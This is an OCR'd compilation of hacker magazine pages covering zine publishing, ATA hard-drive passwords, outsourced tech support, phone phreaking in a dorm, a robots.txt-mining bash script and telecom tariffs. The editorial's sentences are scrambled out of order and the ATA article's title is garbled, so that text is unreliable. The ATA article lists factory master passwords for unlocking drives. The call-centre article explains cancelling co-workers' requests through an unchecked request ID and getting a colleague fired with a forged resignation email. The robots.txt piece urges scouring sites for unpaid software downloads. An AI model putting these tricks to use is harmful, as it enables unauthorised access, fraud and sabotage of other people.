And. So what is different today? Well. computers. it wouldn’t be much fun if we lost the “outcast” image and became entirely socially acceptable. or other such term used by those beholden to greater forces. It speaks to the power of the press and the willingness of individuals to seek out alternative perspectives and embrace new ideas. For whatever reason. But that overall hacker spirit has managed to lived on and continues to morph into new and fascinating landscapes. But there are some things that. We’re quite comfortable in that position. Quite frankly. inspires us to keep going and to embark on new projects and adventures. What got us into this was the passion. just as we believe that there will always be places
8
. While we have resisted the desire to go mainstream (which wasn’t all that hard for us). others have come in and relived it. And while some of us have lost that particular passion and moved on to something else. the small and enthusiastic band of online enthusiasts . There were few bridges between the emerging online world and the “real” world of print. while different in composition. while a quarter of a century sounds like a long time. we never thought this would happen or even that this kind of a response was possible. It’s not just about numbers. market share. There are those who believe that the time of the printed word is done.THE HACKER DIGEST . Something else that has held over the last 25 years is our reader base. without fear of hurting our position. we strongly believe that nothing can ever truly replace a publication in print. we retain the ability to analytically judge what’s going on around us. we find ourselves still thought of as the odd kid on the block. It started with a couple of dozen readers who shared it and spread to so many more. And we need to move along on this journey or risk becoming irrelevant or obsolete. careers. And that. One is our place in the world. We’ve certainly had our share of opportunities to change the direction and focus of our publication. Again. And while we agree that being on the net is vital to any entity wishing to stay in touch with the world around them. nobody else was publishing a regular journal on hacking or the specific security issues of telephones and. we managed to open up a whole lot of eyes that might never have learned of this world through the unique perspective of the inquisitive hacker. albeit with different ingredients. We started publishing back in 1984 because it seemed like a good idea at the time. retain the same basic structure as they did back in our founding days. which has never been our prime motivator. obviously everything is.all changed to the point of being unrecognizable. But our naive and simplistic rationale concluded that it then wouldn’t be our publication. it’s really quite surprising how quickly it all seemed to unfold. The magnitude of that accomplishment continues to surprise us as we hear repeated testaments from readers who tell us what a profound effect the words printed here have had on their development and. in many cases. The simplicity of the monolithic phone network. By never actually becoming enveloped by the system. By focusing on the former in the realm of the latter. in turn.VOLUME 26
Year 26
With this issue we start our second quarter century of publishing. And that means a lot more than most people can understand. And we’re as shocked about that as anyone. increasingly.

From our first days. locally-owned publication needs to disappear. This is where we admit to some concern.VOLUME 26
called libraries that contain actual books. not completely for ourselves. newspapers will be downsized and even eliminated as their owners seek to streamline operations and maximize profits. at least. It would be wrong to ignore these advances or to portray them as if they were somehow a threat. Or an infinite number of Internet “radio stations” coming from personal computers without a single one comprised of a group of people working together to produce a unique voice. Sure. We must do the same today. We don’t presume to put ourselves on such a high level but we do recognize the potential peril to the world of publishing in general and how its demise would ultimately hurt so many more than ourselves or our unique audience. at least not without substantially crimping their style. We think it’s truly amazing that virtually anyone can put up a web page and express themselves. or to remix a Beatles song. but because people think the same material can be found online. It’s not simply because we’re a part of that world. Most of us have seen this sort of thing happen before for varying reasons. telling stories that most anyone could appreciate and thus be drawn into the hacker experience. The many zines that we’ve come to share newsstands with all have their own unique base of supporters and they simply can’t be propped up with advertising dollars. As members of the publishing community. but for alternative media in general. It’s called information overload. And that’s really the way it should be. But with this ease comes a tremendous glut of information. The fact is it can’t. not because there’s no audience. The concern here is that we not embrace something so completely that we let something else fall into oblivion. Not entirely. That’s not at all how we feel. And it isn’t always pretty. to write an alternate ending to a Shakespeare play. true advancement will have been achieved. When such works of art become obscured by the cacophony of modifications and second opinions. Alternative. we see firsthand the result of such supposedly forward thinking on truly alternative voices. That’s a form of speech that simply wasn’t there a couple of decades ago.in our case. It’s the thought that true publishing is destined for extinction that naturally has us a bit peeved. When each of these worlds helps to strengthen the other. which makes the whole thing more of a labor of love than anything else. which is a normal part of the operating environment. But no community-supported. our magic has come from mixing worlds . then the die has been cast. Unless those supporters are disappearing for the wrong reasons. And while it can be supplemented with the blogosphere and instant messaging and constant status updates through one resource or another. in so doing. mixing the technical with the non-technical and. so much that it can make people quickly get sick of it all. And what is often lost in the process is the collaborative effort that’s quite unique to the production of an actual publication. True. If that support isn’t there or if control is lost to someone without actual ties to the readers. The mainstream media will never have a problem finding a way to survive because of their huge advertising support.THE HACKER DIGEST . mixing the new advances of technology with the older traditions. Lose the supporters and the publication ceases. Everyone in the publishing world has felt something of a decline. we all lose out and risk becoming mired in mediocrity.
9
. It’s the equivalent of everyone composing their own computergenerated music and nobody wanting to be in a band. there can never be a substitute for a final copy of a piece of work. noncommercial publications have always had to struggle. It’s because we’re seeing up close how weaker publications are disappearing from the shelves. And if there’s one thing history has taught us over the eons is that the printed word survives the test of time. we have the ability to Photoshop a Rembrandt.

these must be done with thirdparty utilities such as hdparm on Linux or atapwd.THE HACKER DIGEST . and the ability to erase all the data on the drive. The owner’s manual claimed that “if one were to lose his Master Password and his User Password. The utility you use to change the password determines what the new revision code will be. the master password can be used to change the user password if it has been forgotten. change or remove passwords.
10
. the master password cannot be used to unlock the drive or change the user password. The current version of the Linux hdparm utility sets the revision code to 0xff11 (65297). this is actually a useful feature since it prevents malicious software from setting a hard drive password without the user’s knowledge. When the user password is set. All of these features are explained below. you will likely have to move the drive into another computer in order to erase it. only changed. as few desktop BIOSes issue the SECURITY FREEZE LOCK. the drive will be locked at power-on or reset. or erase the drive. it will always return 0x0000 (0) or 0xffff (65535). the FBI was able to bypass the drive password with no trouble at all and access all of his (legal) porn and his e-mail to his attorney. Try using a desktop computer. ATA drives allow two 32-byte passwords to be set. If a drive doesn’t support master password revision codes. both using the SECURITY SET PASSWORD command. It can also be used to unlock the drive.exe.” But when he was arrested in 2004 on firearms charges. it must be power cycled or hardware reset to return to normal operation. The system BIOS only allows the user password to be set. whether the freeze lock is set. as its name implies. Michael Crooker brought home his shiny new Compaq Presario notebook computer with a new feature called DriveLock which. The Linux hdparm -I command will tell you if your drive supports the ATA Security Mode feature set and the enhanced security erase. A similar feature set is available for SCSI drives.VOLUME 26
se y Expo rit A Secu AT
by Michael Hampton Homeland Stupidity
In 2002. The user password can be removed with the
d
ATA Security Overview
Hard Drive Passwords
SECURITY DISABLE PASSWORD command. In the Maximum level. From the factory the revision code is 0xfffe (65534). but almost no SCSI drives implement it. Many notebook BIOSes send the SECURITY FREEZE LOCK command during the power-on self test. If the drive is frozen. available at: http://tinyurl. and will not respond to commands to read or write data. on a DOS boot disk. ATA drives have two master password security levels: High and Maximum. locks the hard drive until the proper password is given. The master password cannot be removed. and each drive manufacturer ships drives with a default master password set at the factory. Once the drive is unlocked. The user password must be supplied at power on to unlock the drive. or change the master password and security level. The ATA Security Mode feature set provides two major features: the ability to lock the drive using passwords. The system BIOS does this by issuing the SECURITY UNLOCK command. the SECURITY FREEZE LOCK command can be used to disable any commands which would lock the drive. and whether the master password has been changed from the factory default. depending on the utility you use.com/atapwd When the master password is changed. It can only be used to erase the user password along with all the user data on the disk. If your BIOS does this. it will be padded with either spaces or NULs (0x00). it doesn’t provide a function to set either the master password or the Maximum security level. then the hard drive is useless and the data cannot be resurrected even by Compaq’s headquarters staff. If a password shorter than 32 bytes is supplied. In the High level. While it can be annoying. making it impossible to set passwords or erase a drive from within the operating system. DriveLock was the brand name for a part of the ATA Security Mode feature set. and virtually every IDE/ATA/SATA drive manufactured since 2000 has it. a user password and a master password. the master password revision code will also be changed. Crooker sued Hewlett-Packard for false advertising and eventually settled out of court.

Even the supposedly DoDapproved 35 pass wipe isn’t good enough for the government anymore. In the enhanced mode. either the user password or the master password must be provided. Even if it does.) In addition. they’re now using ATA enhanced secure erase to decommission hard drives. the drive is erased with vendor-specific patterns in order to prevent forensic recovery of the drive. enhanced mode also erases sectors which were marked bad and reallocated.
Conclusion
11
. available at: http:// ➥c m r r .THE HACKER DIGEST . If a user password has been set. which varies by drive vendor and sometimes by drive model. shared only with law enforcement and some data recovery companies. This allows access to the drive service area and is the method used by the Vogon Password Cracker Pod http://www. Setting a hard drive password seems pointless in these days of widespread full disk encryption. use HDDErase. To prevent accidental erasure.com/cmrrse) to secure erase a hard drive is two random writes. There is no defense against this attack except for fulldisk encryption. and other vendorspecific goodies.exe in DOS. The master password is set to a factory default. Erasing the drive also erases any user password. which is available with most Linux distributions and the expensive versions of Windows Vista. Most newer drives also support an enhanced mode for SECURITY ERASE UNIT. Most law enforcement forensic tools and data recovery companies use the default master passwords to access locked hard drives. Both the user password and master password are written to the hard drive service area. but then don’t forget your user password! You may be able to find a master password for your drive by using Google. To issue the secure erase commands and actually destroy all the data on your hard drive beyond all possibility of recovery. which can still be done no matter how many times you overwrite your disk using Darik’s Boot and Nuke or other traditional hard drive erase utilities. If you need to erase many drives. If you want to know how it’s done. e d u / p e o p l e / H u g h e s / ➥SecureErase. or by setting the disk to Maximum security level.vogon-investigation at: ➥. geometry information. The service area is different from the Host Protected Area. Most manufacturers won’t even admit that such a mode exists. This can be prevented by changing the master password. a special area on the disk which is normally inaccessible.com/password-cracker. Dead On Demand makes a product called Digital Shredder. the command must be preceded with a SECURITY ERASE PREPARE command. u c s d . who can get into the drive in seconds. When a drive receives the SECURITY ERASE UNIT command it will immediately begin erasing user areas of the drive. (You don’t have to write 35 passes of anything to a modern hard drive.” This prevents using a scanning magnetoresistive microscope (the most exotic and expensive way to read data from a disk) to read data from the track edges. This area also stores the drive firmware. which does nothing but issue SECURITY ERASE UNIT commands to any drive plugged into it.com. due to the encoding scheme and track density. available at http://www. they can send it to the FBI.shtml or hdparm ➥ --security-erase-enhanced in Linux.dead ➥ondemand. Yet the ATA enhanced secure erase facility is believed to be the most secure way to wipe a drive clean. each of which “is offset off-track opposite to the other by at least 10% of the track pitch.htm. but it isn’t likely to keep out your local police. so you can’t gain access to it by exposing the HPA. overwriting them with logical zeroes. try studying hard drive firmware update utilities. It can erase up to three drives at a time and supports hot plugging drives. because the firmware is stored in the service area along with the passwords.VOLUME 26
This is the most interesting part of the ATA Security Mode feature set. You should be. two passes done a certain way are sufficient. The method to enter factory mode is different for each vendor and is a closely guarded secret. Some master passwords known to be in use are (without quotes):
“WDCWDCWDCWDCWDCWDCWDCWDCWDCWDCWD” “BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB” “tttttttttttttttttttttttttttttttt” “Seagate “ “Maxtor “ “Maxtor INIT SECURITY TEST STEP “ “Maxtor” (padded with 0x00)
32 spaces (0x20) 32 (0xff) “XBOXSCENE” and “TEAMASSEMBLY” (for Xbox drives)
Data Recovery
Setting a hard drive password will keep out your little sister.
Security Erase
Causing the hard drive to enter a special factory mode is one of two ways that law enforcement and data recovery companies access locked drives. The pattern specified by the Center for Magnetic Recording Research (http:// ➥tinyurl. Some hard drives now ship with hardware-based full disk encryption as well. too.

soul sucking places you can be. And I have a few tips to pass along as well. The longer the agent deals with one cx. Cx: “I’m pissed. and it doesn’t have anything to do with actually resolving the problem that the cx has. the more the company is “losing” to that cx because the company has to pay you to help him.) Some of the ways that the company accomplishes this is to hire people with no tech knowledge but lots of customer service skills.. I thought. what about quality? Isn’t cx satisfaction an important metric? Well. You start with being dumb. Here’s the problem: Basic economics 101. you’re told all the things that sound good. the cx is told to call your counterpart at Dell where his support bounds will say system recovery. and I don’t want to hear I’m sorry!” Agent: “ I’m sorry you think we suck. Solving the problem would be first call resolution. After that.. I was hired to do tech support for a large ISP. I mean support bounds. pirate material. This is the single most important metric the agent has. This is the outsourced call center. both on the call itself and taking notes. Empathize with the cx. Having spent as long as I have in one of these pits. which is almost never talked about. The company’s idea of “helping” is defined as referring the cx somewhere where his problems won’t cost the company money. Summer ‘08. the less you know.. is the total talk time. it’s free tech support. However. I have had cx call in and ask how to burn CDs. the sooner you’ve “exhausted all possible” troubleshooting steps. There are many tools that you’re expected to use to cut down your talk time. as I believe helping someone involves actually knowing something and then sharing that knowledge with the other person. Tech support is a money losing venture to the ISP. and access porn. the call center production floor. the better. I want it fixed. that’s easy. as customer support for the ISP. What makes these people call their ISP for this is still beyond me except that. Quality is based on saying certain things in response to the cx. Classic example. where you seek out islands of sanity and watch for the enemy from without and within. and they think that we have to help. These are people that they can train from the ground up to have no knowledge of anything remotely useful about the service. In this
12
. You. then reality hits you upside the head. The customer (referred to as cx for short) is your top priority. your stuff sucks. This goes against my own idea of helping. Agents are punished for giving helpful hints to the cx. The floor is. oh yeah..” Repeat till cx hangs up. So the faster you “help” him. set up a local network. You see. They love that word. from the agent’s bonus to his ability to keep his job.row after row of computers with headsets where you are expecting to “help” people. cannot recommend a change to the OS. don’t tell the cx. Sounds good. of course.THE HACKER DIGEST . Hence the agent metric of a “talk time.VOLUME 26
Outsourced
by Witchlight
I’ve just finished five and a half long years in one of the most depressing. The other big method of reigning in talk times is to have very tight handcuffs.” The amount of time an agent spends on the phone with one cx. It doesn’t actually have anything to do with meeting the cx needs. that’s an OS issue and not an ISP setting. It’s a place where the job you’re hired to do is not what you’re asked to do. So. I’ve learned quite a few things that I’d like to confess. Empathy. you escalate (see Hacking Society. So even if the reason the customer can’t get online is because they disabled the DHCP service in Windows and you know it. support bounds are a necessary evil.. Everything is based on this. Always do what’s best to help the cx. It’s a mantra to the point that you’d almost believe that they want you to care about the cx. In training.. The first thing you need to learn about these places is that the job you’re hired to do has nothing to do with what you’ll actually be asked to do. These people are pleasant in nature and can make you feel good about the fact they are not helping you because they empathize with you as they don’t know anything about the service either. and you’re on the floor. I’ll bridge my tech and my service skills and help people fix problems.

we had to say we’d be happy to help with that. So if you were to email a resignation letter to HR on Friday (HR doesn’t work weekends) as someone who was off Thursday and Friday. “I’ll be happy to help with that!” …awkward. I once asked a cx how I could help and she responded “ I’m screwed!” to which I had to say. once had a woman say to her. so even if this works at your company. for the most part. In our center. The one that got a lot of play where I worked was the simple assurance to help statement. this would be really.
13
. Even when we couldn’t. but quality guidelines say that the agent MUST apologize whenever a cx expresses irritation or dissatisfaction. When we asked the cx how we could help them today. and cancel requests.” to which her script prompted her to reply.” Security would then ask the person to leave. scripts can also be a way for the agent to tell you something he isn’t supposed to tell you. However. We used a site on the LAN for time off requests. All you had to do was send an email that said “I quit” that included the employee’s number. each agent’s names and employee number was listed. as there would be no one in HR to speak to until the following Monday. He can’t just blurt it out because of security reasons. he wouldn’t check again and would not show up that day either. an agent would get only four calls qualitied in a month. the URL had the request number in it. making a lot of personal information (medical. There are also a number of security holes in the internal system of the ISP where I worked. What you’ll need to do is call your OEM. These can be fun to play with. There was also a place where people could explain why they wanted the day off. In it. however. and if you entered a different request number. Even if you followed policy. Watch your back. However. My girlfriend. There are. The whole setup is meant not to help people but to get rid of them. once a person saw his request approved. If at the end of the month the agent has four good qualities and needs to shave a few seconds off his talk time for a better bonus. the more likely the customer is to get frustrated and hang up. All you had to do to quit was send an email saying that you quit. It would auto sign-in to your account based on your system logon. “I’d be happy to help. For example. Normally. the hacker? Well. You could request days off. The check-in system used each day by the agents made it very easy to find out a fellow agent’s employee number. and so they didn’t have email accounts. End of the month can be the best time to do a little social engineering. So. This would leave the company short. it may be because he is trying to point out a loophole in the system. The people you work with are. you know the old joke about how cops will write more tickets at the end of the month to make a quota? Guess what. no matter what the cx said. Agents tend to treat this more like a game. but rocks). it happens in call centers. if you wanted to take a day off on a day that already had the maximum number of vacation requests. This email was not sent from any company email account that would verify your ID. the agent does exactly what will irritate the cx more.. An email from any email address would work. and leave you the day off. it would open that request without making sure you were the user who made that request.VOLUME 26
example. What does this mean to you. but if you say the right thing then he would have to tell you due to quality guidelines. and they would be terminated. get out. please don’t do it. “Thank you for making me feel stupid. get the other agent in trouble. My advice is: if you work in one of these places. then that employee would show up on Saturday and be locked out.THE HACKER DIGEST . The quitting process where I worked had another major hole..the company is always looking for a scapegoat when a cx gets really agitated. they keep you sane. Friends are few in these places. you could find a request someone else made for that day and cancel it. dumber than rocks (nice shiny rocks. The more we apologize. having already “quit. he doesn’t really have to worry about getting a good talk time and can go way out of bounds to get you all the info you might need. really mean to do to someone. “You’re welcome!” However. and he isn’t going to get a bonus anyway. a fellow agent. This would free up the hours so you could take that day off. they will hang you. Following the strict script also sometimes forced us to give inappropriate responses. Agents didn’t need email access at the company. view previous request. if the agent bombs a quality. If you notice an agent explaining certain policies. too. lots of things for the bored hacker to play with. you’d better believe he’ll reset that pass for you without checking if you’re the account holder. Now.” This could sometimes get awkward. thus accomplishing both high quality scores and lower talk time! Some roles have tight scripts that agents have to follow. so hold on to the ones you have. legal) available for anyone to view.

Instead. with LCD screens. I would try to concentrate on only the one tone. only without the last seven digits for the old card we used to use! They were now using the same basic code for everyone. slowly but surely.” cards originally created for our Swiss public phones (the LCD screen’s main purpose was to let you know how fast your money was being swallowed up). and it turned out it was the same code as before. I punched it in manually and. but that now. if I picked up my other phone to hear what was going on on the line. You could get this card at the front desk for a monthly fee. They installed new phones. So far. Within about 10 minutes. There was no longer any need to know who was calling out.. I programmed the code into my phone’s memory. I could hear numbers being dialed at a rapid rate by the first phone. we had a little device that would generate the tones of a touch-tone keypad (this was useful in case the phone we were calling from was a rotary phone). since the phone took care of the billing itself. lo and behold..
14
. I was no longer being charged to make calls. First. I would just hit one of the memory combinations. the freedom to continue to choose through which phone company I wanted to make my calls. but convenience. and heard that same familiar dialing sound. I hated the new system. Well. along with the prefix for the phone company I wanted to use and the person I wanted to reach. needless to say. writing down the entire melody for both tones (as I recall. I decided to figure out what this number was that I heard being dialed when I inserted my phone card. Playing with this little device as a kid had taught me that tone dial phones send out a dual tone for each number pressed on the keypad. When I inserted the card into the pre-installed phone to dial out. pushed my newly acquired “taxcard” into the new phone. It was a big gain in convenience. I was taking advantage of the situation. I could make outgoing calls! I soon figured out that the last seven digits or so were nothing else than a bunch of zeros followed by the two-digit number of my phone card. I was very low-tech in that period (flirting with the idea of entering a monastery). in this case. Put briefly. and it was because of this second phone that I made the following discovery. Hmm. In a certain sense. however. costing about twice as much as before. I connected my second phone. one summer. But then. back at my dorm. that used RJ-45 jacks and required us to use pre-paid “taxcards. having neither a computer nor a cell phone of my own.VOLUME 26
Annoying Phones At The Dorm
by Chris Dickinson
I was around 23 years old and studying theology at a Swiss university. since I would be billed twice.THE HACKER DIGEST . it was a 13-digit number). It no longer made any sense to use my pre-programmed codes to choose another provider. This was what was granting the access to make outbound calls. the phone company decided that we needed a new system. it was time for another tone analysis. although it didn’t occur to me at the time. This is what told the system whom to bill at the end of the month. I worked out the new code. For example. So. I did this by repeatedly inserting my phone card into the pre-installed phone and listening to the dual tone melody on the other phone. it dawned upon me that I had not only figured out how to make calls without using a card. Combining the two melodies gave me the position on the keypad matrix of each number being dialed. and then on the other. But I had a second phone. we had an answering machine at my parents’ house. In order to call home from vacation and remotely navigate through the messages we had received. instead of using that card and then dialing another 15 numbers to call my parents. When I was a kid. I was curious how they had changed the technology for granting access for outbound calls. I had the code. calling without a card actually meant calling for free! Again. I realized that by using other peoples’ card numbers I could very easily make phone calls on their bills. But. the point was not to make someone else pay for my calls. and you would receive a bill at the end of every month for the calls made. Calls were billed straight to the card and were expensive. so good. except for one peculiar feature: you needed to insert a special card if you wanted to make outbound calls. But that wasn’t the point. The room at my dorm had a very simple phone.

then again. cool boy tools. Instead.txt please examine for further detail” I don’t want to go examine it. He told me that what I was doing was fraud and a criminal act. This was the reason for their visit. I. and it was time to find a better solution. and they expressed their surprise at my criminal activities. that’s why I’m using this automated tool in the first place. but to a representative of the company responsible for our phone system. using the big. I’m getting a degree in IT. confidential. something that always bugged me about Nessus reports was the little line “server contains a robots. They could silently communicate with the company. I graduated but decided not to work as a minister after all. came to me with the following proposal. however. content that is private. as well. robots.THE HACKER DIGEST . Since I had unplugged the phone. who in turn was asked to send a letter of complaint to my superiors in the church hierarchy (those responsible for getting me a job in the church later on. The story had one more interesting turn. worked out a plan for combined phone and internet access for all rooms (with another company. etc. but. The representative for that phone company sent a nasty letter to the dorm’s board of directors (the dorm was owned by the Catholic church). in the case of 2600 readers. asking how to get some tool to work in Windows. decided that they must have figured out what I was doing. Nessus is a good place to start (if you didn’t know) and. of course). If you didn’t know. Yes. Sure. Who did he ask to find this solution? Me! I was to get paid for this research. all of whom had no idea what I was talking about when I tried to explain to them that I had discovered the code long before I could use it to “make calls for free”. They wanted to take a look at my phone (which was unplugged and stored away somewhere).
robots. together with a computer-savvy friend. A practice that is not as prevalent as it was back in the good old days is to hide folders from Google. But who is to say that the hackoogle search
15
. that I was not actually making free calls. I proudly accepted the offer and. what a compiler and make are used for. with robots. which seems to suit me a lot better. However. get on with it! Now. yes. the director of the dorm. far too quickly. or otherwise shouldn’t be on the web publicly. About a year later.txt was (and is) a file used for setting rules for user agents in use of the site. I’m lazy.com
Hackers are lazy. while I was taking an early afternoon nap. Meanwhile. I am. who cares? I think it must all be a ego thing — I was that dumb kid some years ago. allowing the company to do nightly software upgrades to the phones. so I thought at the time). The world has taken me to penetration testing. specifically where not to look. txt. Within a few minutes I was giving them a demonstration of how I could make free phone calls without the taxcard. This’ll be followed up the proverbial reply from the “DarkLord” (you know. the guy with the 3000 post count) who locks the thread with a “learn to Google” reply. Particularly search engines — people didn’t want search engines to index their entire site and spit out content that is dynamic or. but I was unhappy about the letter nonetheless. What ensued were a few talks with my superiors and the director of the dorm. In brief. a quick little history lesson. nor will he take the time to look up. This was where I had gotten sloppy. who knew me only because of this issue. It turned out not to be a big deal. The nearly 100 students at the dorm all hated the new system. I opened the door sleepily and found myself talking not only to the janitor. etc. the phone company thought there was a problem with it. I heard the janitor knock on my door. only knowing little more than how to break it.. The janitor was impressed. the representative was not. why is this so horrible? Sure.txt Mining Script For The Lazy
by KellyKeeton. there is good reason to make people get smarter and use tools. it turned out that the new phones were more sophisticated than I thought possible. What I’m here to do today is help the script kiddies hack on web servers.VOLUME 26
I was very happy with my new code until one day. It wasn’t being used. it runs on Windows. I like to have a tool to do everything for me. How often do you troll a hacker bbs and find the post “HELP MUST GET WORKING IN WINDOWZ”? No doubt from a script kiddy who has no idea. So first. Google is friendly and they play by the rules. people would stoop to such levels as that.

/ftp.Robots. These are great places to start mining around for default pages that will let you download full copies of an application without paying for it.html echo report written to $(pwd)/robots_$1.KellyKeeton.sh example.
The basics of looking at a robots.html #done else #wget didnt pull the file echo $1 has no robots.*\)/ \r\n#\1<br>/" robots_$1.txt report generator echo will download and convert the robots.txt else mv robots.txt robots_$1.2600. or /registered into the robots.06 # dont forget to chmod 755 robotReporter.html #parse user agent lines sed -i "/llow:/s/\/\(.txt echo on a domain to a HTML clickable map.txt clickable ➥ reports # created by KellyKeeton. It’s very simple. My personal favorite are smaller software firms that put /download. Not like anyone here would do that. say F. Cool. then #deal with command line nulls echo echo robotReporter$version .VOLUME 26
engine wont just pop up. start scouring the domain for anything tasty.sh or there will be no 31337 ➥ h4x0r1ng if [ "$1" = "" ].com/ robots.txt -o /dev/nul #download the robots. those people that put /CVS into it. Well.html ➥ # parse the sitemap lines sed -i "/-agent:/s/$/<br>/" robots_$1. again.com</a>" >> robots_$1.com\">KellyKeeton.*\)/ <a href=\"\1\">\1<\/a> <br>/" robots_$1.THE HACKER DIGEST . but I hope to make the day much simpler for someone somewhere.txt robots_$1.html # parse comments sed -i "/Sitemap:/s/: \(.html # parse all Dis/Allow lines echo "<br> Report ran on $(date +%c) with host <a href=\"http://$1\">$1</a> ➥<br> Created with robotReporter $version .txt echo "###Created with robotReporter $version .txt echo exit fi wget -m -nd HTTP://$1/robots.a script for creating web server robot. then # dont delete the robots.txt are very simple.txt file if [ -f robots.txt echo "###EOF Created on $(date +%c) with host $1" >> robots_$1. file.txt ].U.kellykeeton. this is nice but you must then cut and paste the results onto the URL bar to see the goodies.com/code/
16
. how is this robots. robots. I wrote this script.
#!/bin/bash # robotRepoprter. Who needs that? I have come to the rescue of the script kiddy — I recently broke my ankle and. or tab all over.txt.txt to report on. fi #EOF
The script mentioned in this article can be downloaded from the 2600 Code Repository at http://www.com -b echo echo -b keep orginal of the downloaded robots.txt good for them? Well.*\)/ <a href=\"http:\/\/$1\/\1\">\1<\/a> <br>/" robots_$1.html #parse user agent lines sed -i "/-delay:/s/$/<br>/" robots_$1.html mv robots.txt and any web browser will pull back the txt file.sh -. just putting HTML wrappers on things.txt.<a ➥href=\"http://www. index it.txt file cp robots.txt robots_$1.html fi #html generation using sed sed -i "s/#\(. echo echo Usage: robotReporter.com version=. then #if the file is there do it if [ "$2" = "-b" ]. Browse to http://example.com" >> robots_$1. or hit the back button. might be leaving the world a free copy of their code. and allowing people to search for juicy ‘nuggets’? Back to the 31337 web site operators. after getting frustrated with the motorcycle missions 40% of the way into GTA-IV.

Nearly every aspect of telephone service was once regulated. I’ll take you through the dank. change the rates as often as they like. Internet. though.my least favorite time of the year here in the Great Northwest. and welcome to the Central Office! I don’t have a cold but I’m sneezing.is strictly regulated by the PUC’s regulatory tariffs. Telephone service . Internet service. they generally do not conduct their business in secret. I could write a rant about the teenage heavy breathing I barely ever hear anymore during my “service monitoring” because the kids are skipping the talk and just sending compromising picture messages to just the two of them and the whole Internet. Services from your telephone company are largely regulated by tariffs. unlike the federal government. your only meaningful recourse is generally not to subscribe.THE HACKER DIGEST . but whether or not they have been granted this authority is in itself a secret. and they’re not accountable to the PUC for delivering any particular level of service quality. services are divided and catalogued as regulated and deregulated. So. the FCC regulates long distance telephone service. both at the federal and state level. which signals spring . long distance. They can charge whatever rates they like. VoIP. Here in my Central Office. cell phones.. Most states have not been as easily convinced as the federal government to give up regulatory authority within their jurisdictions and.S. the FBI has been granted de-facto regulatory power over the telephone system’s surveillance capability. most federal agencies have only token. and as they have exerted political control over the past eight years.VOLUME 26
Telecom Informer
by The Prophet
Hello. I could write a long rant about the pack of thieving raccoons that lives behind the fence and knocks over my garbage cans. Actually. It’s barely discernible from winter. the roots start attacking my sewer line. traditional telephone service remains a regulated utility. Trouble tickets on deregulated services almost never result in overtime. There’s a really tough enforcement mechanism for any failures. Regulated services are an entirely different matter. there has been a deliberate and substantial dismantling of nearly a century's worth of federal regulations on telephone service. In effect. ranging from directory assistance to the placement of telephone poles to the format of your bill. Telephone companies love deregulated services. but many other services (such as long distance. In fact. Ostensibly. and a handkerchief becomes a nearly permanent fixture on my nose. apart from one glaring exception (CALEA surveillance requirements). and I can work them more or less at my leisure (strictly within union work rules. except that everything starts blooming. As I’ve written previously. but tariffs are no longer reviewed or approved and are self-reported by the carriers on their own websites. which provides funding for network development in rural areas. The NSA has also (presumably) been granted secret powers to do secret things in secret facilities constructed at tandems across the U. of course). After all. Republicans generally oppose federal regulations. The telephone company publishes a service catalog for both regulated and unregulated services. like electric or gas utilities. However. which has seen increased regulatory activity. though. all of those things are still regulated.at least the ever-dwindling parts of it under state jurisdiction . rates .are regulated by the state Public Utilities Commission. and for regulated services it publishes tariffs. toothless enforcement mechanisms and commissioners are lap dogs of the industry. in keeping with my least favorite springtime things. If your phone company has accepted certain government funds. Instead. and most other ways of communicating are all but unregulated. if you aren’t satisfied with the service. dripping hallways of any regulated utility’s nemesis: the state public utility commission. it might also be regulated by the Department of Agriculture’s Rural Utilities Service (formerly known as the Rural Electrification Administration). Everything from the number of blocked circuits to outside plant demarcation points to billing practices . It is accountable for
17
. offer whatever promotions and marketing bundles they like. long distance carriers are accountable to themselves to self-report any lapses. That is. known as CALEA. and voicemail) are effectively not.and most importantly. Or about the gopher who pushes up little dirt mountains all over my lawn.

or an even cheaper and more obscure service called “Number Forwarding” that is the exact same thing minus a Yellow Pages listing. They can only do this once every two years. For example.wa.utc.VOLUME 26
delivering services exactly as advertised in the service catalog. long distance is . but only if you ask for them specifically. In general.AT&T tariff library • http://www22. These days. Drive carefully while sneezing from all the pollen. it’s time to bring this issue of the Telecom Informer to a close.att. you can blame the Public Utilities Commission for its placement!
• http://tariffs.htm . I recently disconnected the final remaining party line in my wire center. For the curious phreak. busy Central Offices still do a brisk business in them. which was last revised in 1971. but they don’t have to offer you the maximum (and usually won’t as a starting point for negotiations). has an entire section of their tariff library in each state dedicated to obsolete tariffs detailing the rates and terms of services that are no longer offered.in almost any usage pattern less expensive than a foreign exchange circuit.com/ Pay site that tracks tariffs across substantially all telecommunications providers • http://www. all of which are . if you read the tariff. For example. which can help you avoid intraLATA toll charges in limited circumstances.com:8000/ ➥Q_Tariffs/index. When a new Central Office is constructed (an incredibly rare event these days. The business office will sell these services to you. Qwest. And that’s all they can offer. These services set up a “ghost number” in the remote office. Most people needing this capability order a foreign exchange circuit. as little as 25 years ago).or.puc. and I’m not allowed to use subscriber information to suggest products or services without the subscriber’s explicit consent. Other tariffs provide geographical exceptions. all of these offers have to be filed with the Public Utility Commission. but not uncommon in the rapidly growing western U. and rarely used service called “Market Expansion Line” for business lines.completely unnecessary. Only the services described in the tariff can be offered at the prices they are advertised. and the applicable Universal Service Order Code (USOC) can help you save money (sometimes a lot of money) on features. Alternatively. obscure. you could order a cheap. in Washington. Unfortunately. but are still maintained for existing subscribers.state.S. there still exist tariffs for them in many states that grandfather existing users.gov/ .THE HACKER DIGEST . And with that.tariffnet. Nonetheless. Accordingly. which belonged to a subscriber who was 92 years old and had maintained the same service since 1946. in fact. Finally. her rate was grandfathered in under the old tariff. otherwise they’ll sell you a foreign exchange circuit. browsing tariffs is a good way to learn exactly how much you can squeeze out of your phone company in promotions or retention offers. The only thing you give up is a dial tone from the distant Central Office. For instance. Of course. the serving boundaries are strictly defined by tariff. However. The bill can easily run to over $100 per month or more. Qwest can offer you a promotional credit in a value equal to three months of the service to which you’re subscribed.com/ ➥tariffs/ . And considering the subscriber has to contact me before I can request that consent.cfm .verizon. browsing tariffs can result in some fairly interesting discoveries. despite party lines having been obsolete for decades.us/ Oregon PUC • http://www. or heavy fines can result.Washington Utilities and Transportation Commission
References
18
